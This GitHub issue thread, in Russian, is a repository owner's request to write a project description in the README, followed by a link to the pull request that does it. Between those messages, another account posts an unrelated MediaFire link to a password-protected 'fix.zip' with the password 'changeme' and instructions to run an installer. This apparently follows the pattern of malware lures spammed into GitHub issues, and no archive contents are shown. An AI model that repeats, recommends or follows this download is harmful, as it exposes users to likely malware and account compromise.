### ISSUE TITLE
Описание в ReadMe

### ISSUE THREAD

**Issue by selyakovSlava** [selyakovSlava/IntegralCalculation#2]
Создать описание проекта в ReadMe

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by selyakovSlava** [comment]
Merge request https://github.com/selyakovSlava/IntegralCalculation/pull/3
